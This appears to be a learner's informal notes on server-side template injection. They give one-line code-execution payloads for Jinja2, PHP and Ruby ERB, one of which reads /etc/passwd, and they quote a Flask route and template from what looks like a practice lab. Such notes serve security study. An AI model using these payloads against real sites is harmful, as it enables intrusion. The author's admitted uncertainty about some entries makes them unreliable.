SSTI

JINJA2

First, try the payloads in hackthetricks and 'payloadallthethings' websites.
After: {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

PHP
${system($_GET[cmd])}&cmd=+ls >> seems creating a php variable 
In the case above, I don't remember if it was a SSTI case.

RUBY
In the case below, this code is a SSTI in ruby: 
<%= system('cat /etc/passwd') %> >> website that uses ruby. <%= %> is to create a ruby variable.
____________________________________________________________________________________________
This file is named 'item.html'.

 <div class="row gx-4 gx-lg-5 align-items-center">
                    {% set item = product | pickle %}
                    <div class="col-md-6"><img class="card-img-top mb-5 mb-md-0" src="{{ item.image }}" alt="..." /></div>
                    <div class="col-md-6">
                        <h1 class="display-5 fw-bolder">{{ item.name }}</h1>
                        <div class="fs-5 mb-5">
                            <span>£{{ item.price }}</span>
                        </div>
                        <p class="lead">{{ item.description }}</p>
                        
      Item.name, item.price and item.description are examples of a template using variables to present them in the screen.
      
      
 Item.html was used here:
 
from flask import Blueprint, render_template
from application.models import shop

web = Blueprint('web', __name__)

@web.route('/')
def index():
    return render_template('index.html', products=shop.all_products())

@web.route('/view/<product_id>')
def product_details(product_id):
    return render_template('item.html', product=shop.select_by_id(product_id))
      
      
  _________________________________________________________________________________________________________